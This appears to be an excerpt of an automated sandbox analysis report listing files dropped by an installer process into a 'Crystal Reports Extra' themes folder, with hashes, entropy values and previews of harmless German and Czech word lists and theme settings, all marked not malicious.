                                                          SHA-512:9E3F04ECD63162EC0DFAA8A2C933E61223FB63882729E72F266536E731D04118428F6B61A26BDC6C52BF8EAFC871AC132E579352AF5717E05AF100696DD7E600
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Slova na 5 p.smen.AD.LA.ALICE.AR.NA.BABKA.BAHNO.BAL.K.BIBLE.BL.TO.BOMBA.BAL.K.BAN.K.BATOH.CELER.CHATA.D.RCE.CHL.B.DCERA.D.VKA.FACKA.GEKON.GYMPL.H.DKA.HLAVA.HOLKA.HRNEC.J.TRA.JEN.K.J.DLO.KAB.T.KABEL.KAPKA.KOZ.K.KR.VA.L.VKA.L.HEV.L.SKA.MAMKA.MOTOR.MOT.L.OBJEV.OKOUN.RADEK.S.DLO.SOD.K.TATRA.TUL.K.UBRUS..PICE.VOD.K.V.FUK.Z.PAD.ZLATO
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\is-BVDPO.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):347
                                                          Entropy (8bit):4.5058472076654565
                                                          Encrypted:false
                                                          SSDEEP:6:SuFJAxMGf+wnvVEk6ubLCG3jOQU4n+4rc/m8YzaY1oxv:PFawqvVR+aOenKu8UOv
                                                          MD5:73E29CD1BBF3A6420A590F85A288F5DD
                                                          SHA1:F21FE09F412F784231A5759FE09DA29857DEC9CE
                                                          SHA-256:9198FD4883326B94F1A0C7A6CCDF0314F78DEC4A2AC7F415E6E11C58D5D8A1C1
                                                          SHA-512:3E6049D302826EFC67A909A6C36E972020C0993BC1A69851E61D82CBBB1C10712FC11CEC6DD8428D76063F863C2F5DE2CE9AD83DBF675FD70F8215DF4D57F0F2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: # keyboard.lst for German theme.0|A.0|a.3|B.3|b.3|C.3|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.0|Y.0|y.6|Z.6|z.5| .0|!.0|@.9|#.0|1.0|2.0|3.0|4.0|5.0|6.0|7.0|8.0|9.0|0.7|,.8|..7|;.8|:.9|..9|..9|..9|..9|..9|..9|..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\is-V6CGM.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):30
                                                          Entropy (8bit):4.161406329721842
                                                          Encrypted:false
                                                          SSDEEP:3:U96EFjpfhOKIt:UYEFyt
                                                          MD5:776994AB6EA8743809D4BA88F52F179B
                                                          SHA1:3BC5391AB61A9B351BE40BF00B3F0E1C00FB7550
                                                          SHA-256:E3F5998ED37D340074E22A6ECFCFE7F0DED18E42E93FED4768F91A767F792BBE
                                                          SHA-512:F08C3AA95D4B0D13A9CCC54E0ADC837F9F2FF48E3803713DABB41723D0FAABA601B8AF320FAA18F8092040DF70599F279EC169A5C2C43B31654C13C69689CF5F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_locale_name=de_DE.UTF-8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\keyboard.lst (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):347
                                                          Entropy (8bit):4.5058472076654565
                                                          Encrypted:false
                                                          SSDEEP:6:SuFJAxMGf+wnvVEk6ubLCG3jOQU4n+4rc/m8YzaY1oxv:PFawqvVR+aOenKu8UOv
                                                          MD5:73E29CD1BBF3A6420A590F85A288F5DD
                                                          SHA1:F21FE09F412F784231A5759FE09DA29857DEC9CE
                                                          SHA-256:9198FD4883326B94F1A0C7A6CCDF0314F78DEC4A2AC7F415E6E11C58D5D8A1C1
                                                          SHA-512:3E6049D302826EFC67A909A6C36E972020C0993BC1A69851E61D82CBBB1C10712FC11CEC6DD8428D76063F863C2F5DE2CE9AD83DBF675FD70F8215DF4D57F0F2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: # keyboard.lst for German theme.0|A.0|a.3|B.3|b.3|C.3|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.0|Y.0|y.6|Z.6|z.5| .0|!.0|@.9|#.0|1.0|2.0|3.0|4.0|5.0|6.0|7.0|8.0|9.0|0.7|,.8|..7|;.8|:.9|..9|..9|..9|..9|..9|..9|..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\settings.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):30
                                                          Entropy (8bit):4.161406329721842
                                                          Encrypted:false
                                                          SSDEEP:3:U96EFjpfhOKIt:UYEFyt
                                                          MD5:776994AB6EA8743809D4BA88F52F179B
                                                          SHA1:3BC5391AB61A9B351BE40BF00B3F0E1C00FB7550
                                                          SHA-256:E3F5998ED37D340074E22A6ECFCFE7F0DED18E42E93FED4768F91A767F792BBE
                                                          SHA-512:F08C3AA95D4B0D13A9CCC54E0ADC837F9F2FF48E3803713DABB41723D0FAABA601B8AF320FAA18F8092040DF70599F279EC169A5C2C43B31654C13C69689CF5F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_locale_name=de_DE.UTF-8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\is-13KCB.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):454
                                                          Entropy (8bit):5.122530076508582
                                                          Encrypted:false
                                                          SSDEEP:12:hoxOKNStZIyehKQAQ0bMcmmUYZCLKaVWECplBT26xpFmY6Mbb:hopNCVeYVQ0bRmgsLKaPCn7DmY6Mbb
                                                          MD5:DDC9476957886517205D29154B3D7404
                                                          SHA1:7E9A6E86AD4556DCF050F82A10097F61DBD73968
                                                          SHA-256:6C0AFE6326B00996FE6FA6FF7EC5DEF39FC2F77965FB6D0C4F910EF433584891
                                                          SHA-512:70AD87EB0D34ECD2DE0DFA22029E1F7D7CDF3A94E08D3B3CD68875D2020675DAE7238AE468AC0F3AAC2B33E1202A7EE9E8902C959E7E3AA88C7F8E32BA737B36
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mittellange W.rter (mit ....).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.F.NF.GRO..GR.N.K.SE.K.LN.K.HL.L.RM.L.WE.M.RZ.M.WE.M.LL..BEN..BER.WEI..DAF.R.F.HRE.GL.CK.H.FTE.H.GEL.K.STE.L.NGE.M.BEL.M.GEN.M.HRE.SCH.N.ST.CK.S.DEN.Z.GEL.ZW.LF.BR.CKE.F.NZIG.HEI.EN.K.RPER.L.FFEL.SP.LEN.S.DPOL.W.SCHE.ZUR.CK.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\is-4U8BK.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):262
                                                          Entropy (8bit):4.977809871929063
                                                          Encrypted:false
                                                          SSDEEP:6:/f+KNStZIyeh6FM/AgvRTSxtvT4cmLCirYZq2Npv5QBf2lWd:/GKNStZIyehKQAQ0bMcmmUYZLjRlU
                                                          MD5:D932B1FFC8B5321EE9C7A9EF7CBB8BFA
                                                          SHA1:5E6ACE040D0A3291687DC129A2AB02DB4DC5C1FC
                                                          SHA-256:041068A572C5265693A0369E79E2080055F5EDDCE35A80024985ED45D150A2C4
                                                          SHA-512:C9D4250A1ACA4CD7C342ACBD17BD5B6EAA957364C2F535DC87D27E1B85A8E9493B5C8F743F8FFF14A509C5A78E4130C185720662ABD9086F8B56B214111E7D1E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Kurze W.rter (mit ....).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt..L.B.R.F.N.F.R.FU..J.H.K.R.MA..MU...HR..SE.RU..S...T.R.Z.H.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\is-CF6RI.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):748
                                                          Entropy (8bit):4.937127782916994
                                                          Encrypted:false
                                                          SSDEEP:12:/GKNZIyehKQAQ0bMcmmUYZAafAmk7df5oUj7/KV5FdjBYfZ10t5AHpBkR9Cxiuoq:/XNVeYVQ0bRmgnImw5oUj7/KVFjSL03Y
                                                          MD5:3C435E36363E652943C29CD86F2C8818
                                                          SHA1:CF6B7A8A8731730D21407AFFE40D06B94415D28B
                                                          SHA-256:D55885604A0BC9B1E7767ADA1982A4C788A03160165326CAAAE29207DDD47847
                                                          SHA-512:6F888B08E2AC750911AAA62D928A2E06FB94D421F3D617CF46FF5B1DA0662019AACCFC39C0860E9A6C3DB1BECB71358799FBA2A017DFD22FF51BAF78B0F04858
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Kurze W.rter (gemischt).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.AB.AM.AN.AS.DA.DU.EI.ER.ES.IM.IN.JA.OB..L.PO.SO.UM.WO.ZU.AAL.AKT.ALS.AMT.ARM.ART.AUF.BAD.B.R.BAU.BEI.BIN.BIS.BUG.BUS.DAS.DER.DIA.DIE.EID.EIN.EIS.ELF.ENG.FEE.FIX.F.N.F.R.FU..GAR.GAS.GUT.HAI.HEU.HOF.HUF.HUT.IHM.IHN.IHR.IST.J.H.JUX.KAP.KUH.KUR.K.R.LAS.LAX.LID.LOB.LOK.LOS.MAG.MAI.MAL.MAN.MA..MET.MIT.MU..NAH.NEU.NIE.NOT.NUN.NUR.OFT.OHR..HR.OMA.OPA.ORT..SE.PER.PIK.POL.PRO.RAD.RAR.RAT.REH.ROH.ROM.ROT.RUF.RU..SAU.SEE.SIE.SKI.S...TAG.TAL.TAT.TEE.TOD.TON.TOR.TOT.T.R.TUX.TYP.UHR.UHU.ULK.UND.VON.VOR.WAL.WAS.WEG.WEH.WEM.WEN.WER.WIE.WIR.WUT.Z.H.ZEH.ZOO.ZUG.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\is-D8OE3.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):3354
                                                          Entropy (8bit):4.531608584537004
                                                          Encrypted:false
                                                          SSDEEP:96:k7eWpc/g/2aIMK1MYyQvIMR6+mnfHZoEkGbNrXoN:k7eWO4uaILTyX1+mf+EkGbNr4N
                                                          MD5:804387E652C9D0E72EBEDAABEF18B01B
                                                          SHA1:2429D742AD9C922CBE4A6D06E3C9D2612B3B40C0
                                                          SHA-256:9218C1EE78710FAB0D37B439F2B5357A30DE145345EC53719A160AEA4D440B03
                                                          SHA-512:4CD6F7E271BD8FBF326FFEA90A343471B2E194A1FB850DB09370C34E40A6D431EE9D13290E8E9FA422B34757DDFDF9A0B3412E605A347B3899583C0C609B8985
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mittellange W.rter (gemischt).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.ACHT.AFFE.ALLE.ARZT.ATEM.AUCH.AULA.AUTO.BAHN.BAND.BANK.BASS.BAUM.BEIN.BERG.BETT.BILD.BISS.BLAU.BLUT.BOOT.BROT.BUCH.BURG.CENT.CHOR.DAME.DORF.DORT.DOSE.DREI.DUFT.ECHO.ECHT.ECKE.EINS.ENDE.ENTE.ERDE.ERST.ESEL.EURO.FACH.FALL.FANG.FASS.FAUL.FELD.FEST.FILM.FLUG.FOTO.FRAU.FREI.FROH.F.NF.GANS.GANZ.GAST.GELB.GELD.GIPS.GLAS.GOLD.GOTT.GRAS.GRO..GR.N.GUSS.HAAR.HAHN.HALB.HALS.HALT.HAND.HART.HASE.HAUS.HAUT.HEFT.HELL.HEMD.HERB.HERD.HERZ.HEXE.HIER.HOCH.HOSE.HUHN.HUND.IGEL.JAHR.JULI.JUNG.JUNI.KAHL.KAHN.KALK.KALT.KARO.K.SE.KEIN.KERN.KILO.KIND.KINO.KOCH.KOHL.K.LN.KOPF.KORN.KRAN.K.HL.KUSS.LAHM.LAND.LANG.L.RM.LAUT.LEER.LIED.LILA.LOCH.L.WE.LUFT.MAMA.MANN.M.RZ.MAUS.MEER.MIST.MOND.M.WE.M.LL.MUND.NAME.NASE.NASS.NEIN.NEST.NEUN.NOCH.NULL.NUSS.OBEN.OBER.OFEN.PAAR.PAPA.PARK.PASS.POPO.POST.RAND.RAUM.REDE.REIS.RIND.RING.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\is-GVUMK.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):1088
                                                          Entropy (8bit):4.877421057849533
                                                          Encrypted:false
                                                          SSDEEP:24:PNVeYVQ0bRmg/aDuoCYIFwRWfTi5R+vA6tYHXsRKT8:PNVeYVmFPOwcGL+vA6Dm8
                                                          MD5:D77608EB7BDE2AAC8EEBCCC6D2F8E74C
                                                          SHA1:7D536D5049E56945782C6C12A63E398496CF12F9
                                                          SHA-256:F3AFE957C497ED75E6254531F343C5C4B63B1C68EC9DE552B7ECA5A2F59DC7F3
                                                          SHA-512:96D2ED7C86C1CF36ADEDE5B30C39C200059F32799F7B18E856A26C16BD9F25CF31BBCBD60D53D5814069F1B26B2B2F4E38787DF9B267285F973D6F325972890B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Lange W.rter (gemischt).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.ACHTUNG.ACHTZIG.ANTWORT.APPETIT.BAHNHOF.B.UERIN.BESETZT.COUSINE.DAGEGEN.DESHALB.FAHRRAD.FEBRUAR.FLASCHE.FLEISCH.FREUNDE.GIRAFFE.GREIFEN.HAMSTER.HUNDERT.KELLNER.KETCHUP.KIRSCHE.L.CHELN.LANGSAM.M.DCHEN.MILLION.NACHBAR.NASHORN.NEUNZIG.NOCHMAL.NORDPOL.OKTOBER.PFEFFER.PFLANZE.PFLAUME.PISTOLE.PORTION.RECHNEN.RICHTER.SAMMELN.SCHLUSS.SCHNELL.SCHNITT.SCHRANK.SCHRECK.SCHRITT.SCH.LER.SCHWACH.SCHWARZ.SCHWEIN.SCHWERT.SECHZIG.SEKUNDE.SIEBZIG.SPIEGEL.SPIELEN.SPRACHE.STELLEN.STERBEN.STRASSE.STRUMPF.TAUCHEN.TAUSEND.TELEFON.TEPPICH.TOCHTER.TROCKEN..BERALL.UNDICHT.VERKEHR.VIERZIG.WACHSEN.WASCHEN.WELCHEN.WELCHES.WESHALB.WICHTIG.WIEVIEL.WOHNUNG.ZEUGNIS.ZWANZIG.ZWIEBEL.DEZEMBER.DREISSIG.ELEPHANT.ERDBEERE.FREUNDIN.FR.HLING.GEWITTER.LIMONADE.LUTSCHER.MAULWURF.MOTORRAD.NOVEMBER.PFIRSICH.PFLASTER.POLIZIST.RUCKSACK.SCHLAFEN.SC
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\is-OL7PH.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):242
                                                          Entropy (8bit):5.032744880363562
                                                          Encrypted:false
                                                          SSDEEP:6:w11KNStZIyeh6FM/AgvRTSxtvT4cmLCirYZX3ys7IVwUomv:w/KNStZIyehKQAQ0bMcmmUYZ/7KwUoY
                                                          MD5:E63923B036913F744510158E945A14C5
                                                          SHA1:AD80E651C2306CA30645374737BBB5436B092D8D
                                                          SHA-256:216D1522D74E45E1EA8EFDF164A22D72A1990F3476E1235E786419D10040C259
                                                          SHA-512:20424A3D39312B18F2FCD76C516F4237FEEC54401BA0F854DEAAC3FAB3B21C2A1760C38024CA04605245D5EAA82A265603A3AD13A1714A33F59D2FDB04B9F0C4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Lange W.rter (mit ....).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.B.UERIN.L.CHELN.M.DCHEN.SCH.LER..BERALL.FR.HLING.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\kurz2-3-mit.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):262
                                                          Entropy (8bit):4.977809871929063
                                                          Encrypted:false
                                                          SSDEEP:6:/f+KNStZIyeh6FM/AgvRTSxtvT4cmLCirYZq2Npv5QBf2lWd:/GKNStZIyehKQAQ0bMcmmUYZLjRlU
                                                          MD5:D932B1FFC8B5321EE9C7A9EF7CBB8BFA
                                                          SHA1:5E6ACE040D0A3291687DC129A2AB02DB4DC5C1FC
                                                          SHA-256:041068A572C5265693A0369E79E2080055F5EDDCE35A80024985ED45D150A2C4
                                                          SHA-512:C9D4250A1ACA4CD7C342ACBD17BD5B6EAA957364C2F535DC87D27E1B85A8E9493B5C8F743F8FFF14A509C5A78E4130C185720662ABD9086F8B56B214111E7D1E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Kurze W.rter (mit ....).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt..L.B.R.F.N.F.R.FU..J.H.K.R.MA..MU...HR..SE.RU..S...T.R.Z.H.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\kurz2-3.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):748
                                                          Entropy (8bit):4.937127782916994
                                                          Encrypted:false
                                                          SSDEEP:12:/GKNZIyehKQAQ0bMcmmUYZAafAmk7df5oUj7/KV5FdjBYfZ10t5AHpBkR9Cxiuoq:/XNVeYVQ0bRmgnImw5oUj7/KVFjSL03Y
                                                          MD5:3C435E36363E652943C29CD86F2C8818
                                                          SHA1:CF6B7A8A8731730D21407AFFE40D06B94415D28B
                                                          SHA-256:D55885604A0BC9B1E7767ADA1982A4C788A03160165326CAAAE29207DDD47847
                                                          SHA-512:6F888B08E2AC750911AAA62D928A2E06FB94D421F3D617CF46FF5B1DA0662019AACCFC39C0860E9A6C3DB1BECB71358799FBA2A017DFD22FF51BAF78B0F04858
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Kurze W.rter (gemischt).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.AB.AM.AN.AS.DA.DU.EI.ER.ES.IM.IN.JA.OB..L.PO.SO.UM.WO.ZU.AAL.AKT.ALS.AMT.ARM.ART.AUF.BAD.B.R.BAU.BEI.BIN.BIS.BUG.BUS.DAS.DER.DIA.DIE.EID.EIN.EIS.ELF.ENG.FEE.FIX.F.N.F.R.FU..GAR.GAS.GUT.HAI.HEU.HOF.HUF.HUT.IHM.IHN.IHR.IST.J.H.JUX.KAP.KUH.KUR.K.R.LAS.LAX.LID.LOB.LOK.LOS.MAG.MAI.MAL.MAN.MA..MET.MIT.MU..NAH.NEU.NIE.NOT.NUN.NUR.OFT.OHR..HR.OMA.OPA.ORT..SE.PER.PIK.POL.PRO.RAD.RAR.RAT.REH.ROH.ROM.ROT.RUF.RU..SAU.SEE.SIE.SKI.S...TAG.TAL.TAT.TEE.TOD.TON.TOR.TOT.T.R.TUX.TYP.UHR.UHU.ULK.UND.VON.VOR.WAL.WAS.WEG.WEH.WEM.WEN.WER.WIE.WIR.WUT.Z.H.ZEH.ZOO.ZUG.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\lang7-8-mit.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):242
                                                          Entropy (8bit):5.032744880363562
                                                          Encrypted:false
                                                          SSDEEP:6:w11KNStZIyeh6FM/AgvRTSxtvT4cmLCirYZX3ys7IVwUomv:w/KNStZIyehKQAQ0bMcmmUYZ/7KwUoY
                                                          MD5:E63923B036913F744510158E945A14C5
                                                          SHA1:AD80E651C2306CA30645374737BBB5436B092D8D
                                                          SHA-256:216D1522D74E45E1EA8EFDF164A22D72A1990F3476E1235E786419D10040C259
                                                          SHA-512:20424A3D39312B18F2FCD76C516F4237FEEC54401BA0F854DEAAC3FAB3B21C2A1760C38024CA04605245D5EAA82A265603A3AD13A1714A33F59D2FDB04B9F0C4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Lange W.rter (mit ....).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.B.UERIN.L.CHELN.M.DCHEN.SCH.LER..BERALL.FR.HLING.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\lang7-8.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):1088
                                                          Entropy (8bit):4.877421057849533
                                                          Encrypted:false
                                                          SSDEEP:24:PNVeYVQ0bRmg/aDuoCYIFwRWfTi5R+vA6tYHXsRKT8:PNVeYVmFPOwcGL+vA6Dm8
                                                          MD5:D77608EB7BDE2AAC8EEBCCC6D2F8E74C
                                                          SHA1:7D536D5049E56945782C6C12A63E398496CF12F9
                                                          SHA-256:F3AFE957C497ED75E6254531F343C5C4B63B1C68EC9DE552B7ECA5A2F59DC7F3
                                                          SHA-512:96D2ED7C86C1CF36ADEDE5B30C39C200059F32799F7B18E856A26C16BD9F25CF31BBCBD60D53D5814069F1B26B2B2F4E38787DF9B267285F973D6F325972890B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Lange W.rter (gemischt).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.ACHTUNG.ACHTZIG.ANTWORT.APPETIT.BAHNHOF.B.UERIN.BESETZT.COUSINE.DAGEGEN.DESHALB.FAHRRAD.FEBRUAR.FLASCHE.FLEISCH.FREUNDE.GIRAFFE.GREIFEN.HAMSTER.HUNDERT.KELLNER.KETCHUP.KIRSCHE.L.CHELN.LANGSAM.M.DCHEN.MILLION.NACHBAR.NASHORN.NEUNZIG.NOCHMAL.NORDPOL.OKTOBER.PFEFFER.PFLANZE.PFLAUME.PISTOLE.PORTION.RECHNEN.RICHTER.SAMMELN.SCHLUSS.SCHNELL.SCHNITT.SCHRANK.SCHRECK.SCHRITT.SCH.LER.SCHWACH.SCHWARZ.SCHWEIN.SCHWERT.SECHZIG.SEKUNDE.SIEBZIG.SPIEGEL.SPIELEN.SPRACHE.STELLEN.STERBEN.STRASSE.STRUMPF.TAUCHEN.TAUSEND.TELEFON.TEPPICH.TOCHTER.TROCKEN..BERALL.UNDICHT.VERKEHR.VIERZIG.WACHSEN.WASCHEN.WELCHEN.WELCHES.WESHALB.WICHTIG.WIEVIEL.WOHNUNG.ZEUGNIS.ZWANZIG.ZWIEBEL.DEZEMBER.DREISSIG.ELEPHANT.ERDBEERE.FREUNDIN.FR.HLING.GEWITTER.LIMONADE.LUTSCHER.MAULWURF.MOTORRAD.NOVEMBER.PFIRSICH.PFLASTER.POLIZIST.RUCKSACK.SCHLAFEN.SC
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\mittel4-6-mit.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):454
                                                          Entropy (8bit):5.122530076508582
                                                          Encrypted:false
                                                          SSDEEP:12:hoxOKNStZIyehKQAQ0bMcmmUYZCLKaVWECplBT26xpFmY6Mbb:hopNCVeYVQ0bRmgsLKaPCn7DmY6Mbb
                                                          MD5:DDC9476957886517205D29154B3D7404
                                                          SHA1:7E9A6E86AD4556DCF050F82A10097F61DBD73968
                                                          SHA-256:6C0AFE6326B00996FE6FA6FF7EC5DEF39FC2F77965FB6D0C4F910EF433584891
                                                          SHA-512:70AD87EB0D34ECD2DE0DFA22029E1F7D7CDF3A94E08D3B3CD68875D2020675DAE7238AE468AC0F3AAC2B33E1202A7EE9E8902C959E7E3AA88C7F8E32BA737B36
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mittellange W.rter (mit ....).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.F.NF.GRO..GR.N.K.SE.K.LN.K.HL.L.RM.L.WE.M.RZ.M.WE.M.LL..BEN..BER.WEI..DAF.R.F.HRE.GL.CK.H.FTE.H.GEL.K.STE.L.NGE.M.BEL.M.GEN.M.HRE.SCH.N.ST.CK.S.DEN.Z.GEL.ZW.LF.BR.CKE.F.NZIG.HEI.EN.K.RPER.L.FFEL.SP.LEN.S.DPOL.W.SCHE.ZUR.CK.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\mittel4-6.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):3354
                                                          Entropy (8bit):4.531608584537004
                                                          Encrypted:false
                                                          SSDEEP:96:k7eWpc/g/2aIMK1MYyQvIMR6+mnfHZoEkGbNrXoN:k7eWO4uaILTyX1+mf+EkGbNr4N
                                                          MD5:804387E652C9D0E72EBEDAABEF18B01B
                                                          SHA1:2429D742AD9C922CBE4A6D06E3C9D2612B3B40C0
                                                          SHA-256:9218C1EE78710FAB0D37B439F2B5357A30DE145345EC53719A160AEA4D440B03
                                                          SHA-512:4CD6F7E271BD8FBF326FFEA90A343471B2E194A1FB850DB09370C34E40A6D431EE9D13290E8E9FA422B34757DDFDF9A0B3412E605A347B3899583C0C609B8985
                                                          Malicious:false
                                                          Reputation:unknown
